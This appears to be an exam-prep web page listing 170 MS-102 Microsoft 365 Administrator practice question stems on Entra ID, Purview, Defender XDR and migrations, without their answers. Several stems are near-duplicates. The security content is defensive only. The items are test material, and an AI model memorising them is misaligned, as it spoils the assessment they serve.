MS-102 · domain
troubleshooting
Practise Microsoft 365 Administrator MS-102 troubleshooting practice questions — original exam-style scenarios with answer choices, explanations, and analysis of common mistakes.
Focused practice
Practice troubleshooting questions
Scored sessions drawing only from this domain — pick a length below.
Start 20-question practice test →What this domain covers
What to know about troubleshooting
troubleshooting questions test whether you can apply the concept in context, not just recognise a definition.
How the topic appears in realistic exam-style scenarios.
Which detail in the question changes the correct answer.
How to eliminate plausible but wrong options.
How to connect the question back to the wider exam objective.
Watch out for
Common troubleshooting exam traps
- ▸Answering from memory before reading the full scenario.
- ▸Missing a constraint such as cost, availability, security, scope or command context.
- ▸Choosing a broad answer when the question asks for the most specific fix.
- ▸Ignoring why the wrong options are tempting.
Question index
All troubleshooting questions (712)
Click any question to see the full explanation, or start a practice session above.
A company uses Azure AD Identity Protection. The security administrator wants to block user sign-ins when the sign-in risk level is detected as 'High' for a custom SaaS application. Which Conditional Access policy configuration should the administrator use?
Medium2You are deploying Microsoft Entra ID Governance. Which THREE capabilities should you include to meet compliance requirements for access recertification and lifecycle management?
Hard3A compliance officer needs to ensure that all documents in a SharePoint Online library are automatically labeled with a 'Confidential' sensitivity label if they contain at least one of a predefined list of sensitive information types such as credit card numbers or social security numbers. Users should be able to override the label with a business justification. Which Microsoft Purview feature should the officer configure?
Easy4An organization uses Microsoft Entra ID with Pass-through Authentication (PTA) and Seamless Single Sign-On (SSO). They notice that password changes in on-premises Active Directory are not reflecting immediately in Microsoft Entra ID for some users. What is the most likely cause?
Hard5A security administrator wants to create a custom detection rule in Microsoft Defender XDR that alerts when a device initiates an outbound TCP connection to a known malicious IP address on a non-standard port (e.g., port 4444). Which advanced hunting table should be queried to find these network connections?
Hard6Your company is implementing a Zero Trust security model. You need to ensure that all user access requests to corporate resources are verified continuously, not just at the initial sign-in. Which Microsoft Entra ID feature should you use?
Medium7A company wants to ensure that all new users register for multi-factor authentication (MFA) within 14 days of account creation. Which Microsoft Entra ID feature should be used?
Easy8A company has a Microsoft 365 tenant with the domain contoso.com. They acquire a subsidiary with the domain fabrikam.com and want to add it as an additional domain to the same tenant. The domain is already purchased and DNS management is available. What is the first step the administrator should take in the Microsoft 365 admin center?
Medium9A compliance officer needs to prevent users from sharing emails that contain credit card numbers with external recipients. When a user attempts to send such an email, it should be blocked immediately, and a policy tip should notify the user. Which Microsoft Purview solution should the officer configure?
Easy10A company is deploying Microsoft 365 and wants to ensure that users in the finance department have access to only the apps they need. You need to recommend a licensing strategy that minimizes administrative overhead while enforcing access restrictions. What should you do?
Medium11Contoso wants to require multi-factor authentication (MFA) for all users when accessing cloud applications from any network except the corporate headquarters (trusted IP range). They plan to use Azure AD Conditional Access. Which two components must be configured to achieve this requirement? (Select all that apply.)
Medium12A user reports that they cannot access a legitimate external website because Microsoft Defender for Endpoint is blocking it. The website is required for business. What should you do to allow access while maintaining security?
Easy13A security administrator wants to prevent attackers from stealing credentials by blocking access to the Local Security Authority Subsystem Service (LSASS) from untrusted processes. Which Attack Surface Reduction (ASR) rule should the administrator enable to meet this requirement?
Medium14Which THREE are features of Microsoft Entra ID Governance? (Choose three.)
Hard15Your organization uses Microsoft Defender for Endpoint. You need to configure advanced hunting to query device information. Which TWO tables contain device-related data?
Medium16Your organization is implementing Microsoft Purview Data Loss Prevention (DLP). You need to ensure that sensitive data such as credit card numbers cannot be shared externally via email. Which THREE components should you configure?
Medium17A company has purchased Microsoft 365 Business Premium and added a custom domain 'contoso.com' to the tenant. They want all new users to have email addresses like user@contoso.com instead of the default onmicrosoft.com domain. What should the administrator do in the Microsoft 365 admin center?
Easy18A company with 200 on-premises Exchange mailboxes plans to migrate to Exchange Online. They want to use a Microsoft-provided tool that supports granular control over mailbox migrations, allows batch migrations, and provides detailed reporting. Which migration method should the administrator choose?
Medium19You need to ensure that all documents in a SharePoint Online site are automatically labeled with a 'Confidential' sensitivity label. Which Microsoft Purview feature should you use?
Easy20An administrator has configured group-based licensing in Azure AD. After adding users to the group, some users do not receive licenses. The users are in the group and have an assigned usage location. What is a possible reason?
Medium21Refer to the exhibit. You need to ensure that users accessing Exchange Online from unmanaged devices are blocked. What should you modify in the policy?
Medium22You need to allow external users from a specific partner organization to access a SharePoint Online site using their own Microsoft Entra ID credentials. Which feature should you configure?
Easy23You are troubleshooting an issue where users from a partner organization cannot access a shared app in your Microsoft Entra ID tenant. The partner uses Microsoft Entra ID with a custom domain. You have configured cross-tenant access settings. Which setting is most likely misconfigured?
Hard24You are a security administrator. You need to configure Microsoft Defender for Cloud Apps to detect anomalous user activities such as impossible travel. Which feature should you enable?
Easy25A security team wants to automatically investigate and respond to security incidents across endpoints, email, and identities without manual intervention. Which Microsoft Defender XDR capability provides this automation?
Easy26You are configuring Microsoft Defender for Office 365 anti-phish policy. You want to protect against user impersonation attacks. The CEO and CFO are frequent targets. What should you configure in the anti-phish policy?
Hard27A company uses Password Hash Synchronization (PHS) to synchronize identities to Microsoft Entra ID. They want to enable users to access Microsoft 365 applications from their domain-joined work devices without being prompted to re-enter their credentials. Which feature should they enable in addition to PHS?
Medium28A user reports that they are unable to access a file in SharePoint Online. You check the audit log and see that the file was quarantined by Microsoft Defender for Office 365. What is the most likely reason?
Medium29An organization uses Microsoft Purview Data Loss Prevention (DLP) to protect sensitive data. They want to create a policy that blocks users from pasting credit card numbers into web forms in Microsoft Edge. Which type of DLP policy should they configure?
Medium30You are configuring Microsoft Purview Information Protection for your tenant. You need to ensure that documents containing credit card numbers are automatically labeled as 'Highly Confidential' and encrypted. Which two components must you configure?
Hard31You run the above KQL query in Microsoft Defender XDR Advanced Hunting. The query returns no results. What is the most likely reason?
Easy32Your organization uses Microsoft Defender for Endpoint (MDE). You need to configure an automated investigation and response (AIR) capability that will automatically remediate a confirmed malware infection on endpoints. Which action should you enable?
Easy33A company needs to automatically retain all emails sent to or from external partners for 7 years. They also need to ensure that after 7 years, the emails are permanently deleted. What should you configure in Microsoft Purview?
Easy34A company wants to display a custom help desk phone number and email on the Microsoft 365 sign-in page so that users can contact support easily. Which area of the Microsoft 365 admin center should the administrator use to configure this?
Medium35A user reports that they cannot access Microsoft Teams from their mobile device. Other Microsoft 365 services work fine. You verify that the device is compliant with Intune policies. What is the most likely cause?
Medium36Your organization uses Microsoft Defender for Identity. You need to configure a honeytoken account to detect attackers trying to use the account. In which location should you place the honeytoken account?
Medium37A security administrator needs to block outbound network connections from a compromised Windows device to command-and-control servers. The solution must work at the network layer and be centrally managed via Microsoft 365 Defender. Which feature should the administrator enable?
Hard38You are configuring Microsoft 365 tenant-to-tenant migration. Which THREE tasks must be completed before migrating users?
Easy39Your organization uses Microsoft Entra ID and wants to implement a passwordless authentication strategy. Which TWO authentication methods are considered passwordless by Microsoft? (Choose two.)
Easy40You are a security analyst. You need to investigate a potential malware outbreak on a device using Microsoft Defender XDR. Which three data sources can you include in an advanced hunting query to gather relevant information? (Choose three.)
Easy41You are a Microsoft 365 administrator. A user reports that they received a Microsoft Teams message from an external user containing a link to a malicious website. The user clicked the link but did not enter any credentials. You need to prevent similar incidents in the future. What should you configure?
Medium42The exhibit shows the output of a PowerShell command for a user. The user reports that they cannot access Microsoft Teams, although they have an E3 license (ENTERPRISEPACK). What is the most likely cause?
Hard43You are a Microsoft 365 administrator. Users report that they cannot access Microsoft Teams. You check the Microsoft 365 admin center and see that the service health for Microsoft Teams shows a 'Service degradation' incident. What is the most appropriate initial action?
Easy44An administrator is setting up a new Microsoft 365 tenant and has added the custom domain 'contoso.com'. The domain status shows 'Pending verification'. Which type of DNS record must the administrator add to the public DNS zone to complete domain ownership verification?
Easy45Your organization is deploying Microsoft 365 Copilot. You need to ensure that data security is maintained. Which THREE actions should you take?
Easy46A security analyst needs to identify the specific process (filename) that initiated a network connection from a device to a known malicious IP address over the last 24 hours. Which advanced hunting table in Microsoft Defender XDR provides the necessary data including the initiating process filename and the remote IP address?
Hard47Which THREE factors are considered when Microsoft Entra ID evaluates a conditional access policy?
Hard48Your company uses Microsoft Entra ID and wants to use Microsoft's recommendation to protect against password spray attacks. Which feature should you enable?
Easy49An administrator needs to open a Microsoft 365 support request because all users are experiencing intermittent service outages for Exchange Online. Before contacting support, which two pieces of information should the administrator have ready to ensure efficient troubleshooting? (Choose two.)
Medium50Your organization has a Microsoft 365 E5 subscription. You want to enable Microsoft Defender for Office 365 to protect against malicious attachments in email. Which policy should you configure?
Easy51Which TWO Microsoft Purview solutions are primarily used for data classification?
Easy52A company uses Azure AD Privileged Identity Management (PIM) for role activation. They want to require that any activation of the Security Administrator role be approved by a designated group of approvers called 'Security Approvers'. Activations must include a ticket number and expire after 8 hours. Which PIM configuration should the administrator modify?
Medium53Your company is deploying Microsoft Copilot for Microsoft 365. You need to ensure that only users who have completed a specific training course can use Copilot. What should you configure?
Hard54You are deploying Microsoft 365 for a new subsidiary. The subsidiary has a single domain subsidiary.com. You need to configure a hybrid identity solution with Microsoft Entra ID. The on-premises Active Directory has a single domain and all user accounts are synchronized using Microsoft Entra Connect. You want to ensure that users can sign in to Microsoft 365 using their on-premises credentials without exposing the password hash to Microsoft. What should you do?
Hard55A compliance officer needs to automatically retain emails that contain personally identifiable information (PII) for 10 years and then permanently delete them. Which Microsoft Purview feature should be configured?
Medium56A compliance officer needs to prevent users from sending emails that contain credit card numbers to external recipients. When a user attempts to send such an email, the action should be blocked and a policy tip should be displayed in Outlook telling them why the email was blocked. Which Microsoft Purview solution should be configured?
Medium57You are the Microsoft 365 administrator for Contoso Ltd., a company with 500 users. The company uses a hybrid identity with Azure AD Connect. You have a dynamic group named 'SalesGroup' that includes all users with department attribute equal to 'Sales'. Recently, the HR system updated the department for 20 users from 'Sales' to 'Marketing'. The Azure AD Connect sync completed successfully, and the attribute changes are reflected in Azure AD. However, after 48 hours, these users are still members of 'SalesGroup'. You need to ensure that the group membership accurately reflects the department attribute within the next hour. The solution must use minimal administrative effort. What should you do?
Hard58A company uses Microsoft Entra ID P2 licenses. The security team wants to require multi-factor authentication (MFA) for all users when accessing any cloud application from networks that are not trusted corporate locations. A group named 'BreakGlass' must be excluded from MFA requirements. Additionally, the company wants to block legacy authentication protocols. Which approach should the administrator use?
Medium59A company wants to ensure that all new users created in Microsoft 365 are automatically assigned a specific set of licenses based on their department. The company has 200 users across Sales, Marketing, and IT departments. Each department uses different Microsoft 365 license plans. Which approach should the administrator use?
Medium60A security analyst has identified a new malware sample with a specific SHA256 hash. The analyst needs to immediately block this file from executing on any managed endpoint across the organization, including prevention of future execution. Which Microsoft Defender for Endpoint capability should the analyst use?
Medium61Your company has a Microsoft 365 E5 subscription and uses Microsoft Entra ID. You need to configure a conditional access policy that blocks access from devices that are not compliant with your organization's device compliance policies, as defined by Microsoft Intune. Which assignment should you configure in the policy?
Medium62The security team at Contoso wants to require that any activation of the Global Administrator role in Azure AD Privileged Identity Management (PIM) must be approved by members of a security group named 'GA-Approvers'. Activations must require a business justification and expire after 4 hours. Which PIM configuration should the administrator modify to achieve this?
Hard63A security administrator wants to configure Microsoft Defender for Cloud Apps to block downloads of sensitive files from Salesforce to unmanaged devices in real time. Which Defender for Cloud Apps component must be configured?
Medium64A company uses Microsoft Entra ID and has enabled self-service password reset (SSPR). Users are required to register for SSPR. Management wants to ensure that users from the HR department, who handle sensitive data, must use two methods for authentication during SSPR, while other users can use one method. What is the best way to achieve this?
Medium65A user reports that they cannot access their Microsoft 365 mailbox from the Outlook desktop client, but they can access it via Outlook on the web. Other users in the same tenant are not experiencing issues. What is the most likely cause?
Easy66You are a Microsoft 365 administrator for a small business with 50 users. The company is using Microsoft 365 Business Basic. You need to configure email for the custom domain contoso.com. You have added the domain in the Microsoft 365 admin center and verified ownership. Users currently have onmicrosoft.com email addresses. You need to change the primary email address for all users to their custom domain (e.g., user@contoso.com). What should you do?
Easy67An administrator wants to receive real-time notifications for service incidents in Microsoft 365. The notifications must be sent to a Microsoft Teams channel instead of email. Which configuration should the administrator set up?
Medium68Your company uses Microsoft Entra ID and has a hybrid identity with PHS. You need to ensure that when an on-premises user account is disabled, the corresponding cloud user is also blocked from signing in within 5 minutes. What should you configure?
Hard69A company recently acquired another company and needs to allow users from the acquired tenant to access its SharePoint Online sites as guest users, but only if those users already have accounts in the acquired Azure AD tenant. Which Microsoft 365 feature should be configured?
Easy70Your organization uses Microsoft Defender for Endpoint. You need to ensure that when a device is onboarded, it automatically receives all current threat intelligence signatures. What should you verify is configured?
Medium71Which TWO Microsoft Defender XDR components provide protection for email and collaboration tools? (Choose two.)
Medium72Your organization has Microsoft Defender for Office 365. Users report that legitimate emails from a partner domain are being quarantined. You need to ensure these emails are delivered while maintaining security. What should you do?
Medium73A company uses Microsoft Entra ID for identity management. The security team wants to ensure that users cannot register applications in the tenant to prevent potential data leakage. Which setting should be configured?
Easy74You are the Microsoft 365 administrator for a company that uses Microsoft 365 E3. The company has a single Microsoft 365 tenant. The IT manager asks you to create a new user account for a temporary employee who will start next week and will need access to Exchange Online and SharePoint Online. The employee will leave after three months. You need to create the user account with the minimum required licenses. What should you do?
Easy75A user account was accidentally deleted 10 days ago. The administrator needs to restore the user's mailbox and OneDrive for Business content. Which method should the administrator use?
Easy76Your organization uses Microsoft Defender XDR. You want to create a custom detection rule that triggers an alert when a specific process is created on multiple endpoints. Which advanced hunting table should you use?
Easy77You are planning a migration from on-premises Active Directory to Microsoft Entra ID using cloud sync. You need to synchronize user passwords so that users can authenticate using their existing passwords. Which feature should you enable?
Easy78A compliance officer needs to prevent users from sharing documents that have been labeled 'Highly Confidential' with external users. When a user attempts to share such a document externally, the action should be blocked and the user should see a policy tip. Which Microsoft Purview solution should the officer configure?
Medium79You are designing an incident response plan using Microsoft Defender XDR. You want to automate the containment of compromised devices when a high-severity incident is detected. What should you configure?
Hard80Your organization uses Microsoft Defender for Cloud Apps. You need to create a policy that automatically alerts when a user downloads more than 100 files from SharePoint Online in 10 minutes. What type of policy should you create?
Easy81Which TWO of the following are valid conditions that can be used in a Microsoft Entra ID conditional access policy? (Choose two.)
Medium82A company wants to implement just-in-time (JIT) privileged access for the Global Administrator role in Microsoft Entra ID. Users must request activation and provide a business justification. The request must be approved by a separate group of approvers, and the role activation should expire after 4 hours. Which Microsoft Entra feature should the administrator configure?
Medium83An administrator has created a new user account in Microsoft Entra ID. To ensure the user has a mailbox in Exchange Online, what is the next step?
Easy84You are the Microsoft 365 administrator for a company that uses Microsoft 365 E5. The company has a hybrid identity environment with Microsoft Entra Connect Sync. You need to implement Microsoft Entra Password Protection to prevent users from using weak passwords. You must ensure that the on-premises Active Directory Domain Services (AD DS) environment enforces the same password policies as Microsoft Entra ID. What should you do? (Choose two.)
Hard85You are configuring Microsoft Entra ID for your organization. You need to enable passwordless authentication for users. Which TWO authentication methods are passwordless and supported by Microsoft Entra ID?
Medium86A company uses Microsoft Entra ID P2 licenses. They want to create a Conditional Access policy that requires MFA for all users, but the policy should only be enforced when the sign-in risk is medium or higher. Additionally, they need to exclude a group named 'Emergency Access' from this policy. Which configuration is correct?
Hard87A security analyst wants to create a custom detection rule in Microsoft Defender XDR that triggers when a user receives a phishing email (delivered to inbox) and later clicks a link from that email that leads to a known malicious domain. The rule will be based on an advanced hunting query. Which two tables should the analyst join in the query to capture both the email delivery event and the link click event? (Choose two.)
Medium88A compliance officer needs to block users from sharing emails that contain credit card numbers with external recipients. When a user attempts to send such an email, it should be blocked immediately, and a policy tip should notify the user. Which Microsoft Purview solution should the officer configure?
Easy89A compliance officer needs to automatically classify documents in SharePoint Online that contain credit card numbers. The classification should apply a label that restricts access and adds a header. Which two Microsoft Purview features must be configured? (Choose two.)
Medium90Your organization plans to migrate from on-premises Exchange to Exchange Online. You need to ensure minimal disruption during the migration. Which approach should you recommend?
Medium91A security analyst identifies a malicious file hash on one endpoint. They need to ensure that file is blocked from executing on all other endpoints in the organization immediately. Which Microsoft Defender for Endpoint feature should be used?
Easy92An organization wants to allow only specific company-approved USB devices (e.g., those with a specific hardware ID) on managed Windows devices. All other USB devices must be blocked. Which Microsoft 365 Defender feature should be configured?
Hard93You are a security administrator for a company that uses Microsoft 365 E5. The security team wants to automatically block malicious files and URLs in email attachments and links based on Microsoft's threat intelligence, without manual intervention. You need to configure this in Microsoft Defender for Office 365. What should you do?
Medium94You are a Microsoft 365 administrator for Contoso, Ltd. The security team uses Microsoft Defender XDR. They want to be alerted when a user's Microsoft Entra ID account is disabled but the user still has an active session on a device. You need to configure a custom detection rule that triggers on this condition. Which data source and query approach should you use?
Medium95Refer to the exhibit. You run the KQL query in advanced hunting. What is the primary purpose of this query?
Hard96Your company recently acquired a subsidiary that uses a different Microsoft 365 tenant. You are tasked with merging the two tenants into one. The subsidiary has 1,500 users with unique email domains. You need to migrate all users, mailboxes, and SharePoint data while minimizing downtime and preserving data integrity. You have access to both tenants as global admin. What should you do first?
Hard97An organization with Microsoft Entra ID P2 licenses wants to require multi-factor authentication (MFA) for all users but allow them to register their authentication methods before being forced to use MFA. Which configuration should they implement?
Medium98A company uses Azure AD Connect with password hash synchronization. They want to enable Azure AD Seamless Single Sign-On (SSO) for users accessing Microsoft 365 from domain-joined devices on the corporate network. Which configuration is required on the on-premises Active Directory?
Medium99A company uses Microsoft Entra ID P1 licenses. They want to allow access to a sensitive cloud application only from the company's trusted office IP ranges (10.0.0.0/24). However, the executive team (group "Execs") must be able to access the app from any location. Which Conditional Access policy configuration should the administrator use?
Medium100You are the Microsoft 365 administrator for a large enterprise. You need to ensure that only users with a valid business justification can access sensitive data stored in SharePoint Online. The solution must enforce access reviews and provide detailed reports for auditors. Which TWO actions should you take?
Medium101Your organization uses Microsoft Purview Information Protection. You need to ensure that when users manually apply a 'Confidential' label to a document in Word, the document is automatically marked with a footer 'CONFIDENTIAL' and encrypted. What must you configure?
Medium102Your organization is migrating from on-premises Exchange to Exchange Online. You need to ensure that users can access their mailboxes during the migration with minimal interruption. Which migration method should you use?
Easy103Your organization uses Microsoft Defender XDR. You are configuring a custom detection rule to detect a specific behavior: a user runs a PowerShell script that connects to a known malicious IP address. Which TWO advanced hunting tables should you use in your KQL query to detect this behavior?
Medium104Your organization uses Microsoft 365 Business Premium. You need to ensure that all Windows 10 devices are enrolled in Microsoft Intune and comply with a device compliance policy that requires BitLocker encryption and a minimum OS version. What should you do first?
Easy105A compliance officer needs to ensure that all emails containing sensitive information (e.g., passport numbers) are automatically encrypted when sent to external recipients. The encryption should be enforced without requiring users to manually select an option. Which Microsoft Purview feature should they configure?
Hard106Which TWO are valid methods for adding custom domains to Microsoft 365?
Easy107An administrator wants to add custom branding to the Microsoft 365 sign-in page, including company logo and colors. Which section of the Microsoft 365 admin center should they navigate to?
Easy108Your organization uses Microsoft Defender for Cloud Apps. You need to be alerted when a user accesses a cloud app from an anonymous IP address. Which type of policy should you create?
Easy109A Microsoft 365 administrator needs to add a new verified domain named tailspintoys.com to the tenant and then configure it as the default domain for new user principal names. Which sequence of actions should the administrator perform in the Microsoft 365 admin center?
Easy110Your company has a Microsoft 365 E5 tenant with Microsoft Entra ID P2. You are the security administrator. You need to implement a solution that automatically detects and remediates identity risks. Requirements: - Risky sign-ins (e.g., from anonymous IP addresses) should be automatically blocked. - Users with confirmed compromised credentials should be forced to reset their password at next sign-in. - You need to receive alerts when high-risk events occur. - The solution must minimize false positives. Which Microsoft Entra ID features should you combine?
Medium111You are a Microsoft 365 administrator for Tailspin Toys. The security team wants to reduce the number of alerts generated by Microsoft Defender for Endpoint on Windows 10 devices that run a custom line-of-business application. The application performs many legitimate network connections that trigger the 'Suspicious network connection' alert. You need to suppress these alerts while still investigating all other alerts. What should you create in the Microsoft 365 Defender portal?
Easy112Your organization uses Microsoft Entra ID and has a hybrid identity setup with password hash synchronization. You need to ensure that when a user's on-premises Active Directory account is disabled, their Microsoft Entra ID account is also disabled within 30 minutes. What should you do?
Hard113A development team builds a background service that needs to read all users' calendars via Microsoft Graph without a signed-in user. The service will run on a server with a client secret. Which OAuth 2.0 grant flow should the application use?
Hard114Refer to the exhibit. You are reviewing a Conditional Access policy in Microsoft Entra ID. What is the effect of this policy?
Hard115A company uses Azure AD Identity Protection. The security team wants to automatically block sign-ins that are detected as coming from a known malicious IP address. Which policy should be configured?
Medium116Your organization has Microsoft Defender for Office 365 Plan 2. You need to ensure that when a user reports a phishing email using the Report Message add-in, the email is automatically submitted to Microsoft for analysis and the user is notified of the result. What should you configure?
Medium117A security administrator needs to block executable files (e.g., .exe, .ps1) from running from the %TEMP% folder on Windows devices to prevent common malware execution. Which attack surface reduction (ASR) rule should be enabled?
Hard118A security team wants to automatically investigate and remediate alerts generated from Microsoft Defender for Endpoint, Office 365, and Microsoft Entra ID. Which Microsoft Defender XDR capability should be configured?
Medium119Which TWO actions can you perform using Microsoft Entra ID Governance? (Choose two.)
Medium120You are a Microsoft 365 administrator for a multinational company. The security team reports that a large number of failed sign-in attempts are originating from unexpected IP ranges. The company uses Microsoft Entra ID for identity. What should you configure to automatically block these malicious sign-ins?
Hard121You are investigating a potential security incident in Microsoft Defender XDR. The incident involves a user who received a phishing email and clicked a link that executed a PowerShell script. You need to perform a detailed investigation of the PowerShell script's behavior across all affected devices. Which feature should you use?
Hard122Which THREE steps are required to enable group-based licensing?
Hard123You are a Microsoft 365 administrator for a company that uses Microsoft Entra ID P1. The company wants to allow users to register for self-service password reset (SSPR) and require them to use two methods for authentication. You need to configure SSPR to require two methods. What should you do?
Easy124You are a Microsoft 365 administrator. Your organization uses Microsoft Entra ID and Microsoft Intune for device management. You need to ensure that only compliant devices can access corporate email via Microsoft Outlook on mobile devices. What should you configure?
Hard125An administrator wants to add a custom domain 'contoso.com' to a new Microsoft 365 tenant. The domain is already registered and available. What is the first step the administrator should perform in the Microsoft 365 admin center?
Easy126A company uses Microsoft Entra ID P1 licenses. They want to enforce multi-factor authentication (MFA) for all users when accessing any cloud application from networks that are not trusted corporate locations. A group named 'Emergency' must be excluded from MFA requirements. Which Conditional Access policy configuration should the administrator use?
Medium127A compliance officer needs to prevent users from sharing protected health information (PHI) with external users in Microsoft Teams chat messages. When a user attempts to send a message containing a known PHI data type (e.g., medical record numbers), the message should be blocked and the sender should see a policy tip. Which Microsoft Purview solution should the officer configure?
Medium128You are configuring Microsoft Defender for Identity to monitor on-premises Active Directory. You need to ensure that honeytoken accounts are configured to detect attackers attempting to use them. What is a honeytoken account?
Easy129Your organization is implementing Microsoft Purview Data Loss Prevention (DLP) policies to protect sensitive data in Microsoft Teams. You need to ensure that DLP policies apply to both chat and channel messages. What should you configure?
Hard130Refer to the exhibit. You have a DLP policy in test mode as shown. A user reports that they received a notification that sharing credit card numbers is blocked, but they were still able to share them. What is the most likely reason?
Hard131Your organization has a hybrid identity with Microsoft Entra Connect. You need to migrate from federation to password hash synchronization with seamless single sign-on (SSO). The migration must have minimal user impact. Which tool should you use?
Hard132A company has recently acquired a smaller organization and needs to consolidate both Microsoft 365 tenants. They want to minimize user disruption and retain existing email addresses. Which approach should they use?
Easy133A compliance officer needs to automatically apply a 'Highly Confidential' sensitivity label to any email in Exchange Online that contains social security numbers. The labeling must happen automatically without user interaction. Which two Microsoft Purview components must be configured? (Select the option that correctly identifies both required components.)
Medium134As a Microsoft 365 administrator, you need to manage tenant health and adoption effectively. Which three of the following tools or features should you use to monitor and improve your Microsoft 365 tenant's performance and user engagement? (Choose three.)
Medium135Your organization uses Microsoft Purview Records Management. You need to ensure that records are marked as regulatory records and cannot be deleted or modified by any user, including administrators. The records must be retained for 10 years. What should you do?
Medium136You are configuring Microsoft Defender for Identity (MDI) to monitor for lateral movement attacks. Which of the following activities would MDI alert on as a potential lateral movement?
Medium137Your organization plans to use Microsoft Entra ID as the identity provider for a third-party SaaS application that supports SAML 2.0. You need to configure single sign-on (SSO) for the application. What should you create in Microsoft Entra ID?
Medium138A compliance officer needs to automatically detect documents in SharePoint Online that contain a custom pattern (e.g., employee ID in the format EMP-12345). The pattern will be used to apply a sensitivity label. Which Microsoft Purview feature should the officer use to define the pattern?
Easy139A company has an on-premises Active Directory environment and wants to sync user identities to Microsoft Entra ID while avoiding storing password hashes in the cloud. The company wants to provide seamless single sign-on (SSO) for domain-joined devices. Which authentication method should be chosen?
Medium140Which TWO of the following are benefits of using Microsoft Entra ID Provisioning for cloud HR applications like Workday? (Choose two.)
Easy141A compliance officer wants to automatically apply a retention label to documents that contain SWIFT codes (financial identifiers) when uploaded to SharePoint Online. Which two Microsoft Purview features are required for this configuration? (Choose two.)
Medium142A compliance officer needs to retain all documents in a SharePoint Online site associated with the Finance department for 10 years, after which the documents must be automatically deleted. During the retention period, users must be allowed to edit the documents but not delete them. Which Microsoft Purview solution should the officer configure?
Medium143A compliance administrator needs to ensure that all documents in a SharePoint library are retained for exactly 7 years and then allow users to manually dispose of them sooner after a review. What should they configure in Microsoft Purview?
Medium144Which TWO actions can you perform using Microsoft Defender XDR's Advanced Hunting? (Choose two.)
Medium145Your organization uses Microsoft Purview to enforce data loss prevention (DLP) policies. Users report that a DLP policy blocks legitimate sharing of a document containing sensitive financial data. You need to allow the sharing while still protecting the data. What should you do?
Medium146An organization uses Microsoft Defender for Cloud Apps to monitor shadow IT. They want to enforce policies that block downloads from risky cloud apps. Which Microsoft Defender XDR component provides this capability?
Medium147An organization has a legal requirement to preserve certain contracts as immutable records. Once a contract is declared as a record, it must not be editable or deletable by users, including administrators. Which Microsoft Purview solution should be configured?
Medium148Your organization uses Microsoft Defender XDR and Microsoft 365 E5 licenses. You need to ensure that when a user reports a phishing email using the Microsoft Report Message add-in, the email is automatically submitted to Microsoft for analysis and the user is notified of the analysis result. You want to minimize administrative effort. What should you do?
Medium149Which THREE conditions can be used in a dynamic group rule for a device?
Hard150You are a Microsoft 365 administrator. You need to allow external users to access a SharePoint Online site without requiring them to sign in. Which sharing setting should you enable?
Medium151You are the Microsoft 365 administrator for Fabrikam, which has a Microsoft 365 E5 tenant and Microsoft Entra ID P2. The security team wants to require multifactor authentication for all users when they access any cloud app from outside the corporate network, but they do not want to affect users working in the office. You create a Conditional Access policy named CA01. You need to configure the policy to meet the requirements. What should you do?
Medium152Which TWO settings must be configured to set up a hybrid identity deployment using password hash synchronization?
Hard153A company recently added the custom domain 'contoso.com' to their Microsoft 365 tenant. Users report that they cannot receive external email sent to their new domain addresses. The administrator confirmed that the domain status shows 'Active' in the Microsoft 365 admin center. What is the most likely cause of this issue?
Easy154An organization is implementing Microsoft Entra Verified ID for verifiable credentials. They want to issue credentials to employees that can be used to prove employment status to third parties. Which component must be created first?
Medium155A company plans to migrate their email from an on-premises Exchange server to Exchange Online. They want to ensure that during the migration, mail sent to users who have already been migrated is delivered to Exchange Online, while mail for non-migrated users is delivered to on-premises. Which type of domain configuration should they use?
Easy156Your company is migrating from on-premises Active Directory to Microsoft Entra ID. You plan to use Microsoft Entra Connect Sync to synchronize user accounts. The security team requires that all cloud-only users must be blocked from syncing to on-premises AD. What should you do to meet this requirement?
Hard157You need to ensure that only users from your organization's on-premises Active Directory can access Microsoft 365 services. You have Microsoft Entra Connect configured. What is the simplest way to prevent cloud-only user accounts from signing in?
Easy158You are the Microsoft 365 Administrator for a multinational organization that must comply with various regulatory requirements, including GDPR, SOX, and internal data retention policies. You are deploying Microsoft Purview compliance solutions. Which four of the following actions are valid steps when managing compliance using Microsoft Purview? (Choose all that apply. There are four correct answers.)
Medium159A company is experiencing a significant number of phishing attempts that target high-level executives by impersonating their email addresses. The security team wants to configure protection against user impersonation in Microsoft Defender for Office 365. Which setting must be enabled in the anti-phishing policy to protect these specific users?
Medium160Your organization uses Microsoft Defender for Identity. You receive an alert about a potential DCSync attack. What should you do to investigate this alert in Microsoft Defender XDR?
Medium161You need to configure Microsoft Teams to allow external access for federation with another organization. The other organization uses a different domain. Which setting must you enable in the Teams admin center?
Easy162A security administrator wants to configure Microsoft Defender for Cloud Apps so that when a user accesses a sensitive file in a sanctioned cloud app from an unmanaged device, the user is blocked from downloading the file and a block action is logged in real time. Which type of policy should the administrator configure?
Hard163You are a security administrator for a company that uses Microsoft Defender XDR. You need to ensure that when a file is detected as malware by Microsoft Defender for Endpoint, the file is automatically blocked and added to the indicator list across all devices in the organization. What should you configure?
Hard164A security administrator wants to simulate a realistic phishing attack to train users and measure their susceptibility. The simulation should be run from within Microsoft Defender XDR and provide detailed reporting. Which feature should the administrator use?
Medium165Your organization, Contoso Ltd., has a Microsoft 365 E5 tenant with Microsoft Entra ID P2. You are the Global Administrator. The security team reports that several users have been compromised due to weak passwords. You need to implement a solution that enforces strong password policies and blocks common passwords. The solution must also provide users with the ability to reset their own passwords securely if they forget them, without requiring help desk intervention. Additionally, you need to configure risk-based Conditional Access policies to block sign-ins from anonymous IP addresses and require MFA for high-risk sign-ins. You have the following options: A. Configure password protection in Microsoft Entra ID to enforce a custom banned password list and enable self-service password reset (SSPR) with MFA. Then create Conditional Access policies for sign-in risk and anonymous IP. B. Enable password hash sync and configure pass-through authentication. Create a Conditional Access policy to require MFA for all users. C. Implement Microsoft Entra ID Protection and enable MFA registration policy. Configure password expiration to 90 days. D. Use security defaults in Microsoft Entra ID and enable automatic password rollback. Which option should you choose?
Medium166Which TWO actions are required to configure a custom domain for your Microsoft 365 tenant?
Medium167Your organization wants to use Microsoft Defender for Office 365 to protect against malicious links and attachments in email. Which Defender plan is required?
Easy168A compliance officer needs to retain all documents in a SharePoint Online site associated with the Finance department for 7 years, and after that automatically delete them. During the retention period, users must not be able to edit or delete the documents. Which solution should they use?
Medium169Your company is implementing Microsoft Purview Records Management. You need to ensure that invoices are retained for seven years after they are paid, and then automatically deleted. Which type of label should you create?
Easy170An administrator wants to configure the company's organization profile in Microsoft 365, including the display name, technical contact, and privacy settings. Where should the administrator go in the Microsoft 365 admin center?
